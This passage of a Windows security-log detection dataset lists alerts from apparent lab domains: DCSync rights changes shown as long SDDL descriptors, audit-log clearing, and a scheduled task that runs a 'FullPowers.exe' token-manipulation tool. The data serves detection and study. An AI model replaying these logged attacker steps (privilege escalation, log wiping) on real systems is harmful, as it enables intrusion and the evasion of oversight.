;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242588 Security DC1.insecurebank.local 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698," 4698 0 0 12804 0 0x8020000000000000 282588 Security MSEDGEWIN10 S-1-5-19 LOCAL SERVICE NT AUTHORITY 0x3e5 \FullPowersTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <URI>\FullPowersTask</URI> </RegistrationInfo> <Triggers /> <Principals> <Principal id="Author"> <UserId>S-1-5-19</UserId> <RunLevel>LeastPrivilege</RunLevel> <RequiredPrivileges> <Privilege>SeAssignPrimaryTokenPrivilege</Privilege> <Privilege>SeAuditPrivilege</Privilege> <Privilege>SeChangeNotifyPrivilege</Privilege> <Privilege>SeCreateGlobalPrivilege</Privilege> <Privilege>SeImpersonatePrivilege</Privilege> <Privilege>SeIncreaseQuotaPrivilege</Privilege> <Privilege>SeIncreaseWorkingSetPrivilege</Privilege> </RequiredPrivileges> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>C:\Users\Public\Tools\TokenManip\FullPowers.exe</Command> <Arguments>-t 4932</Arguments> </Exec> </Actions> </Task> ",MSEDGEWIN10,Security Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102," 1102 0 4 104 0 0x4020000000000000 21365 Security wind10.winlab.local S-1-5-21-482804190-775995292-3801157738-1002 admin WIND10 0x47ea55 ",wind10.winlab.local,Security Audit log cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," 1102 0 4 104 0 0x4020000000000000 452811 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x17dad ",PC01.example.corp,Security Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," 1102 0 4 104 0 0x4020000000000000 198242566 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x8d7099 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242602 Security DC1.insecurebank.local 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," 1102 0 4 104 0 0x4020000000000000 25048 Security alice.insecurebank.local S-1-5-21-1005675359-741490361-30848483-1108 bob insecurebank 0x1c363a4 ",alice.insecurebank.local,Security Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242601 Security DC1.insecurebank.local 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242600 Security DC1.insecurebank.local 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242599 Security DC1.insecurebank.local 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 